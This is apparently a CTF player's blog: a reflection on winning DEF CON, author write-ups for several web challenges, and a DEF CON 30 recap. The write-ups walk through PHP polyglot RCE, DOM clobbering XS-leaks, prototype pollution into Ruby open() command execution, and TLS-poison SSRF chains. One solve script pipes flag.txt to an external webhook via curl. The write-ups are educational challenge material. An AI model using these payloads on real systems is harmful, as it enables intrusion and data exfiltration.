Getting a black badge feels surreal. It feels additionally more surreal thinking about where I started and how I got here. I spent a significant part of my life catching up to people I admired. I used to have my future set for an artistic career and I perpetually felt in the shadow of other artists I learned from. All throughout college I was insecure of the fact that I had 0 direction nor pre-requisite coding ability compared to my peers, and felt like I had to spend my free time learning what the fuck multi-threading was just to feel normal around my friends. It’s the same feeling in the CTF scene. Alot of people have, and probably will, doubt my ability. I was happy about learning what SQLi stood for around the same time others in the scene were doing much, much more. And I’ll be honest, I’m not sure I’m done “catching up”. But at the very least, I don’t feel like I have to anymore. I don’t feel the same impulses to compare myself against others. I want to “catch-up” because there’s still a world of vulnerabilities I would love to learn about, for myself.

Epilogue

I remember in the later part of 2020, around November, Maple Bacon and I played in DragonCTF 2020. At that point in time just several months ago I had graduated from PicoCTF to regular CTFs, but DragonCTF was a significant leap of difficulty then what I was used to. I wasn’t really expecting to solve anything in DragonCTF 2020, but then I did. Harmony Chat, which still holds a special place in my heart. I remember thinking “Wow. Just a few months and I’ve learnt so much. What else will I be able to achieve in the CTF space?”

3 years ago, I learnt about the world of CTFs, trying out problems in PicoCTF and learning stuff about SQLi, XSS, simple stack bofs, and the like.

This year, I claimed a black badge at DEF CON 31. I authored multiple web challenges, covering topics from TLS poisoning to TypeScript pop chains. I’m a security engineer. I’ve upgraded from XSS bugs to things like complex v8 speculative optimizational vulnerabilities, novel SSRF techniques, and so much more.

I’m quite happy with the progress I’ve made so far. I’m quite happy with the progress that Maple Bacon has made so far. I love my team, Maple Bacon and MMM, no matter how cheesy that sounds. Looking towards the future has never been so bright.

MAKIMA

Challenge Description

Makima simps check in here

I’m actually a Power stan. I just needed an excuse for people to look at my Makima drawing.

TL;DR

• Hide php in image, making a PHP/image polyglot
• X-Accel-Header redirection through CDN to reach internal .php files and access /uploads/your_img.png/lol.php to execute PHP

The important parts

The default.conf, which is the config used for the nginx proxy server, has an RCE vulnerability:

#default.conf
    location ~ \.php$ {
        internal;
        include fastcgi_params;
        fastcgi_intercept_errors on;
        fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php7.4-fpm.sock;
    }

Any path ending in .php is passed to the fastcgi PHP interpreter which executes the file (with quirks). If such a site allows you to upload your own files, you can upload an arbitrary .php file and navigate to it in order to pass it to the interpreter and achieve RCE. This is especially bad due to fastcgi’s well-known “fix path” quirk:

For instance, if a request is made for /forum/avatar/1232.jpg/file.php which does not exist but if /forum/avatar/1232.jpg does, the PHP interpreter will process /forum/avatar/1232.jpg instead. If this contains embedded PHP code, this code will be executed accordingly.

Additionally, .php locations are all internal meaning that they’re only accessible via internal (within server system) redirects.

The reason we can access index.php is due to this tiny snippet:

    location / {
        index index.php;
    }

index is an internal rewrite of the index file index.php.

The PHP code that handles uploading and file submission actually makes requests through a CDN proxy in file_get_contents:

if(isset($_POST["url"])){ 
    $cdn_url = 'http://localhost:8080/cdn/' . $_POST["url"];
    $img = @file_get_contents($cdn_url);
    $f = finfo_open();
    $mime_type = finfo_buffer($f, $img, FILEINFO_MIME_TYPE);
    $fileName = 'uploads/' . substr(md5(rand()), 0, 13);
    $success = makeimg($img, $fileName, $mime_type);
    if ($success !== 0) {
        $msg = $success;
    }
} 

And in the default.conf all /cdn/ requests are proxied to a flask application running on port 8081:

   location /cdn/ {
        allow 127.0.0.1/32;
        deny all;
        proxy_pass http://cdn;
    }

The CDN handler is defined as follows:

@app.route("/cdn/<path:url>")
def cdn(url):
    mimes = ["image/png", "image/jpeg", "image/gif", "image/webp"]
    r = requests.get(url, stream=True)
    if r.headers["Content-Type"] not in mimes:
        return "????", 400
    img_resp = make_response(r.raw.read(), 200)
    for header in r.headers:
        if header == "Date" or header == "Server":
            continue
        img_resp.headers[header] = r.headers[header]
    return img_resp

This verifies that the URL supplied actually resolves to a filestream with the correct mimetype. The raw bytes are sent back as the response.

So we have 3 things to consider:

• Unsafe fast-cgi handling of .php files - if /uploads/img.jpg/lol.php is accessed and a lol.php doesn’t exist in that path but /uploads/img.jpg does, fastcgi will attempt to interpret the image as code.
• Ability to upload only images through a CDN - the CDN verifies the requested URL leads to an image, before passing it back the image uploader.
• The fastcgi is behind an internal directive so it’s not publicly accessible.

Hiding code in an image // PHP image polyglot

The code only accepts (and, ostensibly, recieves) images, and attempts to compress given bytestreams as a specific image format (.png, .jpg, .webp, .gif) before saving it to the filesystem. But are we able to add arbitrary data to the image?

This still needs to be an image to pass all the previous checks in the CDN, and needs to be a valid image. Otherwise, the PHP GD library will complain and fail to save to filesystem.

We know that FastCGI will happily process an image into its interpreter, so encoding a shell into such a picture would be the way to go.

Note that I gave 4 options. Let me know which image format you used :>

• PNG - You can hide your PHP code in either the PLTE chunks or IDAT chunks of the image, PLTE being important header data and IDAT being the literal pixels comprising the picture. I believe the PLTE chunks were easier to embed into, as a Synacktiv blog post will outline.

• JPEG - You can encode a minishell which, using Huffman tables, decodes into valid code. Embed it at the beginning of the image, and pad your payload with JPEG MCU bits (Minimum Code Unit) then cut off any strangler bits at the end.

• GIF - You can embed a minishell in the small space of null bytes that are always present in the gif header, which persists across compressions/resizes. This is the easiest way, although the margin is small and may require some PHP golfing.

I believe most people either chose the png route or the gif route, the former because of the Synacktiv article and the latter because it was simpler to do. I thought about restricting format to just jpeg, the hardest one imo, but decided not to.

X-Accel-Redirect through the cdn

The internal directive is, at first glance, problematic for us since that means we can’t directly access /uploads/pic.png/doesntexist.php. It’ll be an external request so nginx will simply 404 us. We instead need it to instead force a internal redirect on a succesful response.

This is where the CDN proxy comes into play, as it is an upstream (through nginx’s proxy-pass directive) and therefore able to do internal re-routing.

Luckily for us, nginx features a fancy header called X-Accel-Redirect - a response header which tells the recieving server that the request should be re-routed to whatever the value is in that header (usually a URI). If nginx sees this response header, it will cause an internal redirect to the specified resource. So we can instead specify X-Accel-Redirect since the CDN copies all response headers into the resulting response thrown back to the upload server:

    img_resp = make_response(r.raw.read(), 200)
    for header in r.headers:
        if header == "Date" or header == "Server":
            continue
        img_resp.headers[header] = r.headers[header]

And have its value be that of /uploads/imgyouuploaded.png/doesntexist.php to execute the code within your image!

NOTE: In this way, the CDN proxy gets redirected, not us - so we won’t actually see the results of that redirect. But that’s fine, we don’t need to see our code being run, it just needs to run. :>

Step-by-step

1. Create an image, with PHP code hidden in the bytes, and host it on a server you control (below I have attached a gif example here that has <?php touch("/tmp/lol")?> embedded within).

2. Send over your server url to Makima (the image upload server), the CDN proxy will recieve and pass it back so she can save it to disk. Take note of the provided filename.

3. Your PHP/image polyglot is on the server now. Have your server return an X-Accel-Redirect response header with the value /uploads/your_img.gif/owa.php, and request it again so the CDN copies it, and nginx will redirect the proxy to that URI which triggers FastCGI.

4. FastCGI won’t find /uploads/your_img.gif/owa.php but it will find /uploads/your_img.gif so it interprets that instead. Your PHP code will run.

5. FLAG! pbctf{actually_power_is_the_better_character}

XSPS

XSPS was Jazzy’s challenge which was the last web released in pbctf 2023.

Challenge Description

The Notes app is back again

TL;DR

• CSRF admin to change notes for HTML injection
• DOM-clobber body
• Control href to note with iframes
• Detect frame count for xs-leak

The important parts

The general idea of the app:

• Classic notes app, you can make note with a title and “highlight” one to be featured on the home page
• Notes are stored via cookies
• You can search for notes based on the content of the body

There is a restrictive CSP, plus even further restricting scripts to only nonce:

@app.after_request
def add_CSP(response):
    response.headers['Content-Security-Policy'] = f"default-src 'self'; script-src 'nonce-{g.nonce}'"
    return response

And the bot in the challenge has HTTPOnly cookies. So maybe no XSS - but hey, there’s no CSRF protections. So…

There is a static/main/js file which handles some client-side events, but the most notable one being what occurs when the window loads up:

window.onload = async function(){
    //init
    document.body.highlighted_note = await get_higlighted_note();
    document.body.search_result = document.getElementById('search_result');
    document.body.search_content = document.getElementById('search_content')
    document.body.search_open = document.getElementById('search_open')

    //highlight note
    document.getElementById('highlighted').innerHTML = document.body.highlighted_note;

    //search handler
    document.getElementById('search_button').onclick = search_click;
}

There is functionality that allows you to search the content of submitted notes, based on the client-side JS above.

async function search_name(search_data){
    let should_open = search_data['open']
    let query = search_data['query']

    let notes = await get_all_notes();

    let found_note = notes.find((val) => val.note.toString().startsWith(query));
    if(found_note == undefined){
        document.body.search_result.href = '';
        document.body.search_result.text = 'NOT FOUND'
        document.body.search_result.innerHTML += '<br>'
    }

    document.body.search_result.href = `note/${found_note.name}`;
    document.body.search_result.text = 'FOUND'
    document.body.search_result.innerHTML += '<br>'
    if(should_open)document.body.search_result.click();
}

async function search_click(){
    search_name({'query':document.body.search_content.value, 'open' : document.body.search_open.checked})
}

CSRF -> HTML injection

First and foremost, the CSP is annoying but it allows for iframes. There is additionally 0 CSRF protection - use this to your advantage to make the admin bot navigate to your site and CSRF them to change/update notes where the content contains iframes. How do we leverage this to leak the flag?

DOM-Clobbering window.body

You can inject an iframe with a srcdoc element - combine this with the client-side functionality above and see that you can DOM-clobber the body element of window through your iframe’s srcdoc. This leads to overriding document.body.

Doing so clobbers all the variables of document.body, allowing you greater control over the variables that were set in window.onload’s function in main.js. More specifically - search_result.

When the search button is clicked, search_click() is called which subsequently calls search_name() with an object as the argument - consisting of 2 properties: query being the value of document.body.search_content.value and open being the value of document.body.search_open.checked.

async function search_name(search_data){
    let should_open = search_data['open'] \\document.body.search_open.checked`
    let query = search_data['query'] \\document.body.search_content.value

    let notes = await get_all_notes();

    let found_note = notes.find((val) => val.note.toString().startsWith(query));
    if(found_note == undefined){
        document.body.search_result.href = '';
        document.body.search_result.text = 'NOT FOUND'
        document.body.search_result.innerHTML += '<br>'
    }

    document.body.search_result.href = `note/${found_note.name}`;
    document.body.search_result.text = 'FOUND'
    document.body.search_result.innerHTML += '<br>'
    if(should_open)document.body.search_result.click();
}

Note that the document.body.search_result.href is set to a relative path (if found) of note/${found_note.name}. Then, it’s navigated to via if(should_open)document.body.search_result.click();. Since we can inject iframes of our choosing, we are able to set the base URI within the iframe’s srcdoc, giving us control over what note is pointed to.

Ifr<Iframes>ames

The ability to control the href that the user navigates to sets up our XS-leak - allowing us to navigate to notes of our choosing. We could point the admin to a note containing more iframes, giving us our preferred gadget to leak the flag character by character. We do this by setting up a base href attribute in the srcdoc of the iframe that’s also DOM-clobbering the body element, letting us control what note an admin visits.

When if(should_open)document.body.search_result.click(); occurs, the click() would set _target to that of an iframe (‘iframe B’) that you control within the srcdoc of your first iframe (‘iframe A’). Iframe B can then be detected to have more subframes within, giving you an XS-Leak.

Step-by-step

1. Create CSRF to POST a new note with multiple iframes in it - set it to the name of the flag’s note (which should just be “flag”). Do NOT highlight this note.

2. Open a window of the home page, you’ll need it for later, and give it a unique name (“windowA”).

3. CSRF another note, which contains your iframe that has srcdoc which DOM-clobbers body and search_result (note name doesn’t matter). Highlight this note.

4. Open a window, but use the same name as before (“windowA”) with the location being xsps.chal.perfect.blue#the_b64'ed_JSON_object (the JSON object having properties open=true and query=the substring of the flag you’re guessing) to call the search function.

5. Check that the number of frames present in that window are equal to the number of frames in the first flag note that you made. If the condition is true, the character you guessed is in the flag. If not, the character isn’t in the flag.

6. Repeat until flag: pbctf{V_5w33p1ng_n0t3s_und3r_4_r4d10_s1l3nT_RuG}

Viene Library (11 solves)

Viene Library was a challenge I thought of using my “flag first” design template - where I think of the flag value and make a whole challenge around it. :>

I guess no one remembers vine anymore cause I don’t think anyone remembered the references I put in? Especially the flag value, which was this vine in particular (WARNING: profanity).

Anyway, crisis and nostalgia aside, Viene Library was predicated on combining my favourite bug prototype pollution and some cute and quirky things about how HTTP Rails servers operate.

Step A: What’s in the code?

The public facing server was a NodeJS one that would call back to a Ruby Rails server asking for txt files served from the filesystem - these txt files were my vine poems, or my “vienes”. Both servers were in the same network in the same container. Only the NodeJS one was publicly accessible on port 8080.

viene_controller.rb

class VieneController < ApplicationController
    protect_from_forgery with: :null_session
    def index
        if request.local?
            if request.put?
                request_body = request.body.read
                if ['?', '{', '}', '~', '[', ']', ';'].include?(request_body)
                    render json: {"ERROR": "BAD HACKER"}
                end
                viene = open(request_body)
                render json: {"chosen_viene": viene}
                
            elsif request.post?
                if not ['1.txt', '2.txt', '3.txt'].include?(request.body.read)
                    render json: {"chosen_viene": "Error", "chosen_viene_link": "https://www.youtube.com/watch?v=dQw4w9WgXcQ"}
                else 
                    fullname = File.join("app","assets", "#{rand(1..3)}.txt")
                    viene = File.read(fullname)
                    #memes
                    viene_poem = viene.split('>')[1].strip
                    viene_url = viene.split('>')[0].strip
                    render json: {"chosen_viene": viene_poem, "chosen_viene_link": viene_url}
                end
            else
                render json: {"ERROR": "I didn't understand the request..."}
            end
        else 
            render json: {"ERROR": "Ur not local..."}
        end
    end
end

The Rails server had only one purpose: to serve you vienes. If it recieved a POST request it would give you the appropriate viene if the filename you gave it in the POST was valid, else it would just give you a randomized one. If you gave it a PUT, you could open whatever you want.

I literally mean whatever you want. Ruby’s native open call can open a subprocess and pipe whatever you specify into that subprocess if the argument you pass to open starts with a single pipe (|) character. This is insta-RCE, but of course, only accessible to us if we make a valid PUT request. However…

app.get("/", function (req, res) {
  //Recieve random viene from my "database"

  let rand = (Math.floor(Math.random()*3))+1;
  let filename = rand.toString() + ".txt";

  fetch(vieneSERVER, {method: 'POST', 
  body: filename,
  mode: 'no-cors'})
  .then((resp) => (resp.json()))
  .then((data) => {
    res.send(template(data.chosen_viene || "", data.chosen_viene_link || "https://www.youtube.com/watch?v=dQw4w9WgXcQ"));
  });
});

app.post("/findaviene", (req, res) => {
  if (req.body.viene)
  {
    fetch(vieneSERVER, {method: 'POST', 
      body: req.body.viene,
      mode: 'no-cors'})
    .then((resp) => (resp.json()))
    .then((data) => {
      res.send(template(data.chosen_viene, data.chosen_viene_link));
    });
  } else {
    res.send(template("", "https://www.youtube.com/watch?v=dQw4w9WgXcQ"));
  }
});

In the nodeJS server, there are only 2 potential avenues where it talks to the Rails server, and neither are PUT requests. What do we do?

Putting a pin on it we can take a look further in nodeJS:

function standardizeViene(template, viene) {
  for (let m in viene) {
    if (typeof (viene[m]) === "object", typeof (template[m]) === "object") {
      standardizeViene(template[m], viene[m]);
    } else {
      template[m] = viene[m];
    }
  }
  return template;
}

let vienesubs = [];
app.post("/submitaviene", function (req, res) {
  let newviene = req.body;
  //Standardize submission
  let viene_template = {
    sub_id: crypto.randomBytes(10).toString('hex')
  };
  //I'll look at it later
  vienesubs.push(standardizeViene(viene_template, newviene));
  res.send("Thanks! Your submission has been dropped into our pool succesfully. We'll let you know if we consider it!");
});

If you POST /submitaviene you could have your request body be standardized with standardizeViene which has a crystal clear proto pollution vulnerability. Keeping this in mind, we can take note of the fact that the server uses node-fetch to make requests back to the Rails server, and so our attack plan is formulated:

1. Proto-pollute node-fetch to PUT to Rails server
2. Ruby open() for RCE and get flog

Step B: Proto-pollution and node-fetch

Recent research showcases that the object you pass into the fetch API can be proto-polluted with all the methods and fields you could stipulate to a fetch request (including node-fetch). For us, the ideal candidate here is the headers field, since the method field was explicitly declared in either node-fetch request so we couldn’t proto-pollute that.

The header I was thinking of was the X-HTTP-Method-Override header set to PUT, however I noticed some teams use Content-Type instead and set it to application/x-www-form-urlencoded, and adding _method: PUT in the form data to achieve the same effect.

Either way, proto-polluting headers with either will make Rails interpret the request it recieves as a PUT instead of a POST regardless if whether or not the method field stated it was a POST.

Step C: Ruby open()

Now that you’re in the PUT logic of the viene controller in the Rails server, you get free RCE.

import requests

VIENE_URL_SUBMIT = 'http://vienelibrary.ctf.maplebacon.org/submitaviene'
VIENE_URL = "http://vienelibrary.ctf.maplebacon.org/findaviene"

put_data = {"__proto__": {"headers": {"X-HTTP-Method-Override": "PUT"}}}

payload = {"viene":"|curl https://webhook.site/f6a4aed1-64b2-4b8e-bb60-a970842d6c24 --data \"$(cat flag.txt)\""}

r = requests.post(VIENE_URL_SUBMIT, json=put_data)
print(r.text)
r = requests.post(VIENE_URL, json=payload)
print(r.text)

Someone please affirm me and say they remember vine.

Art Gallery (3 solves)

Art Gallery was my most convoluted web challenge which is semi-inspired by Harmony Chat (DragonCTF 2020) and Contrived Web Problem (PlaidCTF 2020). Shoutout to our sponsor for the #sponsorship-debugging help. :>

Here is the TL;DR -

1. Slightly modified TLS poison to SSRF the FTP server
2. Use FTP server to SSRF an "image file" containing Redis commands to the Redis server via RESP
3. "image file" overwrites a user's sessional key with a node-serialize payload which fires when user visits site
4. flag

Step A: WTF does this code do

The general idea of the app was as so:

• An image gallery that you could upload your own pictures to
• The images were served via FTP
• Session management was done via Redis, storing your art token and an array of filenames to retrieve from FTP, which were serialized for ease of storage

This challenge had alot of moving parts, so we will examine each individually to see how they all work together.

Insecure deserialization: node-serialize

Consult the following code:

app.js

app.use(async function (req, res, next) {
    if (req.session.art_token) {
        let val = await redisClient.get(`image_${req.session.art_token}`);
        //here
        let data_arr = serialize.unserialize(await redisClient.get(`image_${req.session.art_token}`));
        console.log(data_arr);
        req.images = []
        for (let key in data_arr) {
            req.images.push(data_arr[key]);
        }
    }
    res.on("finish", async function () {
        console.log(req.session);
        if (req.session){
            if (req.session.art_token) {
                await redisClient.set(`image_${req.session.art_token}`, serialize.serialize(req.images));
                let data = await redisClient.get(`image_${req.session.art_token}`);
            }
        }
    });
    next();
});

A user’s array of images are serialized and pushed into Redis, but they’re unserialized when needed using the dangerous node-serialize library. If you manage to set image_${req.session.art_token} to an RCE node-serialize payload, it’s game over. However, you couldn’t do anything cheeky like submitting an image with the filename being the payload, you needed to manually change the value of that key in Redis. The Redis server, however, was not accessible to the public.

Image file upload

The code handling the uploading of your own photos is below:

app.post("/upload", (req, res) => {
    if (req.session.art_token) {
        //People can upload max 4 images, which are inserted into their images array rolling basis
        let random_filename = crypto.randomBytes(10).toString('hex') + ".png";

        //high quality design 
        req.files.file.mv(`/usr/src/app/ftp/files/${random_filename}`);

        req.images.push(random_filename);
        req.images.shift();
        res.redirect("/");
    } else {
        res.redirect("/");
    }
});

Now, take note that the filename given to your image appends a .png extension to it (random_filename) - this does nothing as the extension and file format are never checked as valid. Therefore, you could submit a file of any format and it will not get type-checked as a legit PNG image.

Step B: TLS Poison

The first step is the most tedious/hardest to work on. For those unaware, TLS poison is an innovative way to use TLS session ids or tickets to create powerful new SSRF techniques - here is the blackhat talk that discusses this in detail - thank you Joshua Maddux!.

The crux of the TLS poison is that the exploit server that is freely available out of the box needed to be tweaked if you were to use it for the challenge. The jmdx TLS server would expect 2 requests to the DNS server, and it would alternate A records on each request, which is fine for most use cases except my challenge. See, the HTTP server makes a curl request to the specified resource:

Entrypoint into TLS poison part

app.get('/query', async (req, res) => {
    let host = req.query.host;
    const port = parseInt(req.query.port);
    try {
        //im aware its bad 
        cp.execFileSync("timeout", ['5s', 'curl', '-k', '-L', `https://${host}:${port}/`]);
    } catch (e) {
        console.log("Error encountered");
        console.log(e);
    }
    res.send("The curator will observe your art");
});

…and curl caches DNS records for 60 seconds, including DNS records with 0 TTL. This sorta screws us over, since instigating an HTTP redirect (in your domain) within that timeframe will visit the original server instead of asking our DNS server for the IP again. However, you couldn’t wait the whole 60 seconds for the DNS cache to expire in libcurl, cause if the command would hang for a while, the server would complain. An additional 5s timeout was implemented as well which forcibly closes the curl connection way before a DNS server could redirect back to a localhost address. To move around this, you can instead have your DNS server send in multiple A records - one being the legit IP of your domain and the other being a local one - but immediately close the port of the first IP when the HTTP redirect occurs so curl has no choice but to try the other A record instead - the local one.

This will succesfully force curl to ping a localhost IP and not retry a connection with your server IP. Of course, I saw, from the teams that solved Art Gallery, they got crafty around this part, so there are multiple ways to achieve TLS poison while avoiding libcurl’s caching.

In any case, you make the server submit a session ticket (NOT id as TLS 1.2 session ids are too small to fit the whole FTP payload in) to the FTP server, running on port 8021.

The session ticket would look something like:

[Random TLS stuff] \nUSER\nPASS\nPORT 127,0,0,1,24,235\nRETR <userfilename>

The PORT command makes the server operate on active mode, establishing a data channel with localhost on port 6379 (where the Redis server is), which allows you to send a file of your choosing in the server’s filesystem through that data channel.

Anyway, bypass curl’s caching and give the server a session ticket containing some FTP commands, leading to…

Step C: FTP SSRF

Remember the file format quirk?

What we could do with it was upload a file which contained RESP commands that set the user’s key to a node-serialize RCE payload, and have the FTP server RETR that file to Redis on active mode. We couldn’t talk to the Redis server on our own, so let’s use the FTP server to talk to it instead.

Through TLS poisoning, you could submit a session ticket to the FTP server which would contain a bunch of FTP commands that should make the server operate on active mode, establish a data connection with the local Redis server on port 6379, and RETR the malicious “image” file to it.

NOTE: The FTP server was intentionally made to be quiet even when recieving commands, as normal protocol involved it writing responses on input and it would try to do that into the SSL socket which caused problems.

Step D: Redis SSRF

Redis also uses a plaintext protocol, RESP, for data manipulation. When the FTP server establishes a data connection to the Redis one, the file it sends over should contain new-line delimited RESP commands which set a user’s “images” key to that of a node-serialize payload.

Your uploaded ‘image’ file should have the following command inside:

SET image_<your art token> <node serialize payload>

Step E: Fleg

When you revisit the art gallery, the app should deserialize your payload, netting you the flag.

maple{M4N_I_L0V3_SSRFz_1N_My_SSRF5_In_my_556Fs}

Notes

• The curl command was made possible with a pipe to a subprocess on execFileSync. A few people got hung up on this part as I believe this looks like a possible command injection - however, execFileSync passes the entire argument given to it as a single command, so injection was not possible. Others thought to use gopher:// which is technically on the right track in terms of using SSRF, but again, not possible through the subprocess.

• It was a bit of a struggle having the FTP -> Redis part work reliably, but for us, padding the “image” file with hella whitespaces was sufficient for that SSRF to work reliably. Some other teams also appended a QUIT command in their sessional tickets to achieve similar effect.

• Of course, things would have been considerably easier had people managed to be able to connect to either the FTP server or the Redis server on their own. This was not possible as only the HTTP server’s port was exposed.

• Some of you may have been wondering - “Was the FTP server necessary? Was TLS Poison -> Redis not possible?” Maybe it was, but on initial tests the Redis server did NOT like random TLS junk that was included in the sessional tickets. FTP didn’t care, so :/

My team, Maple Bacon, collaborated with CMU’s CTF team PPP and Theori.io’s CTF team The Duck, forming Maple Mallard Magistrates as a merger to participate in DEF CON finals.

The Beginning

Discussions about the merge had occurred earlier in the year - I triangulate it to a month or so before I found myself in Athens, Greece attending ICC. This is important to mention as I heard many people speculate about the existence of MMM and whether or not it was formed as a response to something. The answer is no, the reasoning was very simple: we wanted to play together! Unfortunately, there wasn’t much of a complex reason, we simply had a desire to team up and have fun in Vegas.

Preparation

Shortly after the creation of MMM, general preparations were underway to figure out how to best tackle DEFCON 30. Travel logistics, skill logistics, everything. We wanted to see if there was a way to train altogether in prep for the event, and obviously the best way to do that was to try out in CTFs together, pre-DEFCON. One slight issue though: The merge was a secret. We couldn’t use our full name, since that would likely give away the teams that composed us. It wasn’t a big deal, but we just knew that if we did well in a CTF, then certainly some teams would pick up on this mysterious MMM and wonder who it was. Speculation was inevitable.

Team Setup

From MB side, we brought a subset of people to Vegas but had a slightly bigger subset playing remotely. Of the merger, we had 8 people (me included) attend Vegas with MMM, and around 11 playing remotely.

Now, comparing ourselves to PPP and The Duck, we were certainly new to the scene. We weren’t CTF rookies, but this was our first DEF CON, so the difference in experience was there. Naturally, I was confident in my skills and my team’s but I also wanted to make sure we pulled our weight accordingly in this merger. To that end, MB also participated in and did their own individual training as a way to both gain confidence and to hopefully scale to the top talent in both The Duck and PPP. We played in A/D CTFs together to gain more experience in the format as a team, and to figure out what roles we were comfortable with.

Aside from pure A/D CTFs, we also took a look at as many other CTFs as possible for sake of exposure to as many unique problems as possible. Hell, I would even treat ICC as good exposure and grounds for skill developement! For example, MB played in Faust CTF 2022 solo, finishing 13th. Faust CTF was a great way to get familiar with A/D CTFs for some of us who were new to the format, and allowed us to get some fundamental skills to make our own custom tooling or formulate our own strategies we employed for DEFCON.

Google CTF

GoogleCTF was the first CTF we decided to play in together as MMM. It was a great CTF and a fantastic team-building exercise, and of course, our predictions were correct: for a good portion of the game in GoogleCTF we had occupied first place, so naturally people theorized about our identity. Looking back at it now, I was certain that some people have sussed out that MMM had at least included one of {Maple Bacon | The Duck | PPP}, and I believe that after GoogleCTF some players had indeed managed to figure out some of the truth - some people had (correctly) theorized that MMM had included both The Duck and PPP.

Regardless, we continued on, maintaining secrecy until the time we felt it was right to comment.

GoogleCTF felt like a good barometer to determine what our strengths were, both indiviudally and togehter as a team. It was from here we started to establish friendships and figure out how we worked togehter, how well we meshed together, and things like that.

DEFCON

Day 0

Prep began on the Thursday, August 11, before the start of the competition. Our hotel was close to the conference room to allow for those going to the floor on any given day convenience when travelling back and forth. We managed to arrive pretty early on this day, so we had some free time to explore Vegas before we began planning.

Omega Mart by Meow Wolf seemed like a great destination to spend some time in - it’s an immersive and surreal art exhibition set in a grocery store. It was very weird, but very fun. I also got my new favourite hat from the gift shop~

I used to be a real big art buff before the dawn of CTFs in my life, so I really enjoyed the surreal exhibit. Neon aesthetics are especially pretty to me.

This hat go hard

Anyway, after Omega Mart, we reconvened for planning, debriefed on our strategies and figured out what roles we were going to be responsible for during the competition. It was important that we had an idea of what tasks we were doing, and although it was likely that overlap would occur during the contest, we wanted to at least know who was working on what should relevant information appear and we needed to ping a certain subset of people. In hindsight, I think this pre-planning worked quite well and gave everyone a task to do.

Day 1

On the first day of DEFCON I was on the floor and helped set up networking and other logistics. Being on the floor was a pretty cool experience, although it was understandably very crowded in the forum. I was just happy to see old friends from back during ICC times, and make new ones.

MMM Banner on our table

The first day challenges were unique in that they would be closed down for the day, and new ones would appear the day after - essentially meaning we were free to sleep for that night :> This being my first DEFCON, I unfortunately don’t have anything to compare day 1 against. However, I was told that this was a deviation from the norm, as previous organizers would keep day 1 challenges up for people to hack at overnight. Regardless, the free day of sleep was welcome - but it’s not like I did alot of sleeping anyway.

After the day 1 event ended, my friends and MMMembers JJ, Alueft and I had decided to attend GOTHCON, which seemed like a goth-themed party occurring during the conference. The name is self-explanatory. And yes, we did have fun. We explored the DEFCON floor a bit more thoroughly that night since we didn’t have any time to do so during the competition hours, and I was able to walk around a few other parties and grab a few more stickers.

Live CTF day 1

Based on the problem we were given, we decided to let Robert Xiao represent us for the Live CTF portion of DEFCON day 1. He was in the same room hacking away, which definitely was a cool experience being in proximity to the action and celebrating after his triumph. Congrats to OSUSEC as well for the fantastic performance!

Conclusion of Day 1

Day 2

I woke up early and found myself in the hacking suites with the rest of MMM working on day 2 challenges. This was one of my favourite days since I was able to have fun with the others in the suite as we all tackled problems, scripted exploits, pushed patches and examined network traffic. I also really liked the food we ordered on this day - how have I never tried arepas before despite saying South American cuisine is one of my favourites?

Anyway, day 2 got really chaotic as the competition continued, as infra issues had unfortunately worsened and many technical difficulties popped up for both ourselves and for the others as a whole. We certainly had our fair share of issues, but realistically every team had some sort of fire to put out. I had a real quick break helping out with food delivery to those on the floor, but only for about 10ish mins since once I was back, I went back to doing my job. During my way back to the suites, I stopped by the car hacking village and a few other villages out of curiosity. I really wanted to spend more time at the Aerospace village and the RF village, fields of security I definitely want to explore on my own because it’s About Damn Time™️ I broaden my skills past web and hopefully I can do that in the future.

Of the challenges, one was of particular interest. The KoTH challenge, “corewars”, followed after the same-named programming game where you pit 2 programs against each other and have them execute instructions in memory round-robin style, each program keen on forcing the other to terminate by executing an invalid instruction. In DEFCON, all 16 teams had their warriors battle it out and each round the results were tallied and kept in a giant grid scoreboard. A fun concept, but the scoreboard had a few issues so it was unreliable as a results metric.

Day 2 challenges were to persist after the night, so even though the network closed at the end of the day, it was far from the end for us. A bunch of us stayed up late to continue working on finding exploits for all available challenges: mambo, corewar-n2 and the nivisor series. Honestly, this was not a new strategy for me, or us. We’re all used to staying up during odd hours of the night in order to solve a challenge :>

Conclusion of Day 2

Live CTF day 2

Oh my god Jinmo is SO FAST

Day 3

The final day. Day 3 was to be a shorter amount of time, ending at 1pm so it lasted only 4 hours. But it would be a chaotic and intense 4 hours, given that every team was operating under the assumption that we had a bunch of exploits ready to yeet at the others (which were found last night) once the light went green for the day. When the network opened on day 3, everyone quickly went into their roles and we focused on the CTF for those hours.

Things got hectic as the challenges that were out got, predictably, hit with new exploits and we raced against time to both reflect them and patch our services to oblivion. We had to do this alongside reporting infra fires and interfacing with the organizers whilst still doing our jobs. Even though day 3 was considerably shorter, we weren’t any less busy.

There were some very unfortunate things that occurred on this day, however, including infra issues abound and some other spats of chaos here and there which forced the organizers to close the game 1 hour early. While unexpected, we still had the LiveCTF event to take a look at.

Live CTF day 3

We were knocked out of the bracket by Starbugs, a very good team, and so the finale of Live CTF was a bout against perfect r✪✪✪t and Starbugs. The latter came out on top, so congrats to them!

The Finale

The end results of DEFCON CTF were announced at the end of the closing ceremony, where we came out on top :) we were followed by Katzebin and Starbugs occupying 2nd and 3rd respectively. I was in the suite when this was announced, but we all cheered when the results came in and a subset of us accepted the black badges during the ceremony. I’m extremely happy to have MMM come in first place, especially given the reputation of DEFCON and the work that was put into it.

The final day after the end of the contest was a free-for-all in terms of stuff to do. Since we had the rest of the day to ourselves, many of us wandered around or went sightseeing in Vegas for a bit after the conclusion of DEFCON. Some of us went ahead and had an MMM pool ppparty, since hey we might as well use the pool while we’re here :p

Later that night we saw the other teams at the afterparty, shoutout to perfect r✪✪✪t x organizers, where we mingled and formed plenty new friendships :> special shoutout to team Sauercloud for giving me the matrix gigachad sticker which has a new home on my laptop. One of us also distributed small rubber ducks to the afterparty, and I know this because for a brief 5 minutes the floor was just filled with sounds of rubber ducky squeaks.

Final Thoughts

DEFCON 30 was an interesting and wild ride, all things considered. As I’ve said before, I’m new to the scene so I’m by no means able to talk about this event in any authoritative capacity, so this blog posts comes off less as a general feedback note and more an introspection into what went down during. This was Nautilus Institute’s first DEFCON as organizers of the event, and I’m certain they have already recieved a wealth of feedback, most of which are sentiments I agree on in terms of infra handling, challenge deployment and whatnot. I, like many others, experienced first-hand a few frustrating issues during the CTF, which I believe they have taken note of and are compiling to guide them for next year. I can’t imagine the enormous undertaking it must have been to tackle a world-reknown CTF such as DEFCON, and I am very grateful that they have volunteered and stepped up to the plate for it.

